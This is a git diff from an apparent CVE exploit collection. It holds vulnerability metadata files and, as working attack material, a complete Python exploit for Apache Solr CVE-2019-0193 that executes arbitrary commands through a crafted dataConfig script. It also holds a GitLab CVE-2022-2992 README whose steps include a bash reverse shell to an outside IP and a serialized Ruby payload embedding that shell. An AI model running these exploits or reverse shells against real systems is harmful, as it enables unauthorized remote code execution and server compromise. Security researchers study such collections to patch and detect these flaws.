@@ -1,21 +1,21 @@ -id: CVE-2020-13932 -source: Original -info: - name: Apache ActiveMQ Artemis Clientid XSS - severity: Medium - description: | - In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section. - scope-of-influence: - Apache ActiveMQ Artemis 2.5.0 to 2.13.0 - reference: - https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt - https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt - https://lists.apache.org/thread.html/r7fcedcc89e5f296b174d6b8c1438c607c30d809c04292e5732d6e4eb@%3Cusers.activemq.apache.org%3E - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-13932 - cwe-id: CWE-79 - cnvd-id: None - kve-id: None +id: CVE-2020-13932 +source: Original +info: + name: Apache ActiveMQ Artemis Clientid XSS + severity: Medium + description: | + In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section. 
+ scope-of-influence: + Apache ActiveMQ Artemis 2.5.0 to 2.13.0 + reference: + https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt + https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt + https://lists.apache.org/thread.html/r7fcedcc89e5f296b174d6b8c1438c607c30d809c04292e5732d6e4eb@%3Cusers.activemq.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-13932 + cwe-id: CWE-79 + cnvd-id: None + kve-id: None tags: XSS \ No newline at end of file diff --git a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml index 991427c4..6d7583ba 100644 --- a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml +++ b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml 
@@ -1,20 +1,20 @@ -id: CVE-2022-42889 -source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC -info: - name: Apache Commons Text项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。 - severity: CRITICAL - description: - Apache Commons Text 1.10.0版本之前允许对文本进行相关的变量解析。在Apache Commons Text版本1.5~1.9中,攻击者可构造恶意文本,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。 - scope-of-influence: - 1.5 <= Apache Commons Text <= 1.9 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 - - https://zhuanlan.zhihu.com/p/575580463 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-42889 - cwe-id: CWE-94 - cnvd-id: None - kve-id: None +id: CVE-2022-42889 +source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC +info: + name: Apache Commons Text项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。 + severity: CRITICAL + description: + Apache Commons Text 1.10.0版本之前允许对文本进行相关的变量解析。在Apache Commons Text版本1.5~1.9中,攻击者可构造恶意文本,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。 + scope-of-influence: + 1.5 <= Apache Commons Text <= 1.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 + - https://zhuanlan.zhihu.com/p/575580463 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-42889 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None tags: CVE-2022, Apache Commons Text \ No newline at end of file diff --git a/cve/apache-log4j/2021/CVE-2021-44228/poc.py b/cve/apache-log4j/2021/CVE-2021-44228/poc.py old mode 100755 new mode 100644 diff --git a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py index bf16b9fe..58a5b454 100644 --- a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py +++ b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py 
@@ -1,91 +1,91 @@ -import requests -import json -import sys - - -banner = ''' - _______ ________ ___ ___ __ ___ ___ __ ___ ____ - / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \/_ |/ _ \___ \ - | | \ \ / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) | - | | \ \/ / | __|______/ /| | | || |\__, |______| | | || |\__, |__ < - | |____ \ / | |____ / /_| |_| || | / / | |_| || | / /___) | - \_____| \/ |______| |____|\___/ |_| /_/ \___/ |_| /_/|____/ - - python By jas502n -''' -print banner - -def admin_cores(url, cmd): - core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json' - r = requests.get(url=core_selector_url) - json_strs = json.loads(r.text) - if r.status_code ==200 and "responseHeader" in r.text: - print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status'])) - for core_selector in json_strs['status']: - jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name'] - print '\n>>>>The Core Name = %s' % jas502n_Core_Name - show_config(url,jas502n_Core_Name) - get_config_name(url,jas502n_Core_Name) - URLDataSource_Poc(url,jas502n_Core_Name,cmd) - - else: - print "No core_selector Exit!" - - - - -def show_config(url,jas502n_Core_Name): - config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json" - r1 = requests.get(config_url) - - if r1.status_code ==200 and 'dataConfig' in r1.text: - print ">> config_url= %s"% config_url - print ">%s dataConfig Exit!" % jas502n_Core_Name - else: - print "dataConfig No Exit!" 
- - - -def get_config_name(url,jas502n_Core_Name): - get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json' - r2 = requests.get(get_config_url) - if r2.status_code ==200 and 'config' in r2.text: - print ">> get_config_url= %s" % get_config_url - r2_json = json.loads(r2.text) - r2_str = r2_json['initArgs'] - - print '>get_config_name= %s' % r2_str[1][1] - - else: - print "Core Config Name No Exit!" - - - -def URLDataSource_Poc(url,jas502n_Core_Name,cmd): - debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json' - payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd - headers = { - "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", - "Accept": "application/json, text/plain, */*", - "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", - "Accept-Encoding":"gzip, deflate", - "Content-type":"application/x-www-form-urlencoded", - "X-Requested-With":"XMLHttpRequest", - "Referer":"http://%s/solr/" % url - - } - r3 = requests.post(url = debug_model_url, data=payload,headers=headers) - print ">>>>> debug_model_url= %s" % debug_model_url - if r3.status_code ==200 and 'Requests' in r3.text: - - print "Send Poc Success!" 
- else: - print "No Send Poc Success!" - print r3.text - - - -if __name__ == '__main__': - cmd = sys.argv[2] - url = sys.argv[1] +import requests +import json +import sys + + +banner = ''' + _______ ________ ___ ___ __ ___ ___ __ ___ ____ + / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \/_ |/ _ \___ \ + | | \ \ / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) | + | | \ \/ / | __|______/ /| | | || |\__, |______| | | || |\__, |__ < + | |____ \ / | |____ / /_| |_| || | / / | |_| || | / /___) | + \_____| \/ |______| |____|\___/ |_| /_/ \___/ |_| /_/|____/ + + python By jas502n +''' +print banner + +def admin_cores(url, cmd): + core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json' + r = requests.get(url=core_selector_url) + json_strs = json.loads(r.text) + if r.status_code ==200 and "responseHeader" in r.text: + print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status'])) + for core_selector in json_strs['status']: + jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name'] + print '\n>>>>The Core Name = %s' % jas502n_Core_Name + show_config(url,jas502n_Core_Name) + get_config_name(url,jas502n_Core_Name) + URLDataSource_Poc(url,jas502n_Core_Name,cmd) + + else: + print "No core_selector Exit!" + + + + +def show_config(url,jas502n_Core_Name): + config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json" + r1 = requests.get(config_url) + + if r1.status_code ==200 and 'dataConfig' in r1.text: + print ">> config_url= %s"% config_url + print ">%s dataConfig Exit!" % jas502n_Core_Name + else: + print "dataConfig No Exit!" 
+ + + +def get_config_name(url,jas502n_Core_Name): + get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json' + r2 = requests.get(get_config_url) + if r2.status_code ==200 and 'config' in r2.text: + print ">> get_config_url= %s" % get_config_url + r2_json = json.loads(r2.text) + r2_str = r2_json['initArgs'] + + print '>get_config_name= %s' % r2_str[1][1] + + else: + print "Core Config Name No Exit!" + + + +def URLDataSource_Poc(url,jas502n_Core_Name,cmd): + debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json' + payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding":"gzip, deflate", + "Content-type":"application/x-www-form-urlencoded", + "X-Requested-With":"XMLHttpRequest", + "Referer":"http://%s/solr/" % url + + } + r3 = requests.post(url = debug_model_url, data=payload,headers=headers) + print ">>>>> debug_model_url= %s" % debug_model_url + if r3.status_code ==200 and 'Requests' in r3.text: + + print "Send Poc Success!" 
+ else: + print "No Send Poc Success!" + print r3.text + + + +if __name__ == '__main__': + cmd = sys.argv[2] + url = sys.argv[1] admin_cores(url,cmd) \ No newline at end of file diff --git a/cve/apache-solr/2019/CVE-2019-0193/README.md b/cve/apache-solr/2019/CVE-2019-0193/README.md index a19fa0a1..655c6d93 100644 --- a/cve/apache-solr/2019/CVE-2019-0193/README.md +++ b/cve/apache-solr/2019/CVE-2019-0193/README.md @@ -1,9 +1,9 @@ -# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12) - -## 描述 - -Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。Apache Solr的DataImportHandler是一个可选但常用的模块,可从数据库(通过JDBC)、RSS、Web 页面和文件中导入数据。而且这个模块的配置文件不仅可以在服务端中通过配置文件指定,也可以从用户请求的dataConfig中获取。 - -## 用法 - +# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12) + +## 描述 + +Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。Apache Solr的DataImportHandler是一个可选但常用的模块,可从数据库(通过JDBC)、RSS、Web 页面和文件中导入数据。而且这个模块的配置文件不仅可以在服务端中通过配置文件指定,也可以从用户请求的dataConfig中获取。 + +## 用法 + ```python CVE-2019-0193.py http://192.168.2.18:8983 "calc"``` \ No newline at end of file diff --git a/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml b/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml index a3f83d64..35ac0fe4 100644 --- a/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml +++ b/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml 
@@ -1,40 +1,40 @@ -id: CVE-2019-0193 -source: https://github.com/jas502n/CVE-2019-0193 -info: - name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 - severity: high - description: - 在Apache Solr中,DataImportHandler是一个可选但常用的模块,用于从数据库和其他源中提取数据,它具有一个功能,其中整个DIH配置可以来自请求的“dataConfig”参数。 DIH管理界面的调试模式使用它来方便调试/开发DIH配置。由于DIH配置可以包含脚本,因此该参数存在安全风险。从Solr的8.2.0版开始,使用此参数需要将Java System属性“enable.dih.dataConfigParam”设置为true。 - scope-of-influence: - Apache Solr < 8.2.0 - reference: - - https://issues.apache.org/jira/browse/SOLR-13669 - - https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E - - https://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc@%3Cusers.solr.apache.org%3E - - https://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66@%3Cdev.lucene.apache.org%3E - - 
https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E - - https://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51@%3Cdev.lucene.apache.org%3E - - https://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314@%3Cusers.solr.apache.org%3E - - https://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef@%3Cusers.solr.apache.org%3E - - https://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8@%3Ccommits.submarine.apache.org%3E - - https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E - - https://lists.debian.org/debian-lts-announce/2019/10/msg00013.html - - https://lists.debian.org/debian-lts-announce/2020/08/msg00025.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2019-0193 - cwe-id: CWE-94 - cnvd-id: None - kve-id: None - tags: 对生成代码的控制不恰当, 代码注入 +id: CVE-2019-0193 +source: https://github.com/jas502n/CVE-2019-0193 +info: + name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 + severity: high + description: + 在Apache Solr中,DataImportHandler是一个可选但常用的模块,用于从数据库和其他源中提取数据,它具有一个功能,其中整个DIH配置可以来自请求的“dataConfig”参数。 DIH管理界面的调试模式使用它来方便调试/开发DIH配置。由于DIH配置可以包含脚本,因此该参数存在安全风险。从Solr的8.2.0版开始,使用此参数需要将Java System属性“enable.dih.dataConfigParam”设置为true。 + scope-of-influence: + Apache Solr < 8.2.0 + reference: + - https://issues.apache.org/jira/browse/SOLR-13669 + - 
https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E + - https://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc@%3Cusers.solr.apache.org%3E + - https://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66@%3Cdev.lucene.apache.org%3E + - https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E + - https://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51@%3Cdev.lucene.apache.org%3E + - https://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314@%3Cusers.solr.apache.org%3E + - 
https://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef@%3Cusers.solr.apache.org%3E + - https://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8@%3Ccommits.submarine.apache.org%3E + - https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E + - https://lists.debian.org/debian-lts-announce/2019/10/msg00013.html + - https://lists.debian.org/debian-lts-announce/2020/08/msg00025.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2019-0193 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None + tags: 对生成代码的控制不恰当, 代码注入 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/.gitignore b/cve/apache-tomcat/2020/CVE-2020-13935/.gitignore old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/LICENSE b/cve/apache-tomcat/2020/CVE-2020-13935/LICENSE old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/README.md b/cve/apache-tomcat/2020/CVE-2020-13935/README.md old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/go.mod b/cve/apache-tomcat/2020/CVE-2020-13935/go.mod old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/go.sum b/cve/apache-tomcat/2020/CVE-2020-13935/go.sum old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/main.go b/cve/apache-tomcat/2020/CVE-2020-13935/main.go old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2022/CVE-2022-29885/CVE-2022-29885.go b/cve/apache-tomcat/2022/CVE-2022-29885/CVE-2022-29885.go old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2022/CVE-2022-29885/README.md b/cve/apache-tomcat/2022/CVE-2022-29885/README.md old mode 100755 new mode 100644 
diff --git a/cve/docker/2023/yaml/CVE-2022-37708.yaml b/cve/docker/2023/yaml/CVE-2022-37708.yaml index 85eb7605..e1b6e56d 100644 --- a/cve/docker/2023/yaml/CVE-2022-37708.yaml +++ b/cve/docker/2023/yaml/CVE-2022-37708.yaml @@ -1,23 +1,23 @@ -id: CVE-2022-37708 -source: - https://github.com/thekevinday/docker_lightman_exploit -info: - name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 - severity: medium - description: | - Docker版本20.10.15(build fd82621)易受不安全权限的攻击。Docker容器外的未授权用户可以访问Docker容器内的任何文件。 - scope-of-influence: - Docker 20.10.15, build fd82621 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-37708 - - https://www.docker.com/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37708 - - https://github.com/orgs/docker/repositories - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N - cvss-score: 6.8 - cve-id: CVE-2022-37708 - cwe-id: CWE-732 - cnvd-id: None - kve-id: None +id: CVE-2022-37708 +source: + https://github.com/thekevinday/docker_lightman_exploit +info: + name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 + severity: medium + description: | + Docker版本20.10.15(build fd82621)易受不安全权限的攻击。Docker容器外的未授权用户可以访问Docker容器内的任何文件。 + scope-of-influence: + Docker 20.10.15, build fd82621 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-37708 + - https://www.docker.com/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37708 + - https://github.com/orgs/docker/repositories + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N + cvss-score: 6.8 + cve-id: CVE-2022-37708 + cwe-id: CWE-732 + cnvd-id: None + kve-id: None tags: 未授权访问 \ No newline at end of file diff --git a/cve/gitlab/2020/yaml/CVE-2020-10977.yaml b/cve/gitlab/2020/yaml/CVE-2020-10977.yaml index 11c4e937..588a5e37 100644 --- a/cve/gitlab/2020/yaml/CVE-2020-10977.yaml +++ b/cve/gitlab/2020/yaml/CVE-2020-10977.yaml 
@@ -1,20 +1,20 @@ -id: CVE-2020-10977 -source: https://github.com/thewhiteh4t/cve-2020-10977 -info: - name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 - severity: MEDIUM - description: | - GitLab EE/CE 8.5 到 12.9 在项目之间移动问题时容易受到路径遍历的影响。 - scope-of-influence: - 8.5.0 <= GitLab(CE/EE)< 12.9 - 8.5.0 <= GitLab(CE/EE)< 12.9 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-10977 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2020-10977 - cwe-id: CWE-22 - cnvd-id: None - kve-id: None +id: CVE-2020-10977 +source: https://github.com/thewhiteh4t/cve-2020-10977 +info: + name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 + severity: MEDIUM + description: | + GitLab EE/CE 8.5 到 12.9 在项目之间移动问题时容易受到路径遍历的影响。 + scope-of-influence: + 8.5.0 <= GitLab(CE/EE)< 12.9 + 8.5.0 <= GitLab(CE/EE)< 12.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-10977 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2020-10977 + cwe-id: CWE-22 + cnvd-id: None + kve-id: None tags: EE/CE, cve2020, gitlab \ No newline at end of file diff --git a/cve/gitlab/2022/CVE-2022-2992/README.md b/cve/gitlab/2022/CVE-2022-2992/README.md index 59776cd6..282e156f 100644 --- a/cve/gitlab/2022/CVE-2022-2992/README.md +++ b/cve/gitlab/2022/CVE-2022-2992/README.md 
@@ -1,97 +1,97 @@ -# CVE-2022-2992 -Authenticated Remote Command Execution in Gitlab via GitHub import. -> A vulnerability in GitLab CE/EE affecting all versions from 11.10 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. - -https://about.gitlab.com/releases/2022/08/30/critical-security-release-gitlab-15-3-2-released/#remote-command-execution-via-github-import - -## Prerequisites -- [Ngrok](https://ngrok.com/) -- Ruby -- Redis -- Python3 -- Flask -``` -sudo apt install ruby python3 python3-pip -gem install redis -pip install flask -``` ---- -## Steps -1) Run `./ngrok http 5000` and save the URL. -2) Now to generate the serialized payload run [payload_gen.rb](https://github.com/CsEnox/CVE-2022-2992/blob/main/payload_gen.rb) and save the payload. Below is an example: -```bash -ruby payload_gen.rb 'bash -c "sh -i >& /dev/tcp/172.16.128.129/443 0>&1"' -``` -3) In [server.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/server.py) update NGROK_URL and PAYLOAD variables accordingly. Below is an example: -```py -PAYLOAD = 'ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$359\r\n\u0004\b[\bc\u0015Gem::SpecFetcherc\u0013Gem::InstallerU:\u0015Gem::Requirement[\u0006o:\u001cGem::Package::TarReader\u0006:\b@ioo:\u0014Net::BufferedIO\u0007;\u0007o:#Gem::Package::TarReader::Entry\u0007:\n@readi\u0000:\f@headerI\"\baaa\u0006:\u0006ET:\u0012@debug_outputo:\u0016Net::WriteAdapter\u0007:\f@socketo:\u0014Gem::RequestSet\u0007:\n@setso;\u000e\u0007;\u000fm\u000bKernel:\u000f@method_id:\u000bsystem:\r@git_setI\"8bash -c \"sh -i >& /dev/tcp/172.16.128.129/443 0>&1\"\u0006;\fT;\u0012:\fresolve' -NGROK_URL = 'https://dc09-41-01-99-69.in.ngrok.io' -``` -4) Create an access token for the user on gitlab and select all scopes. 
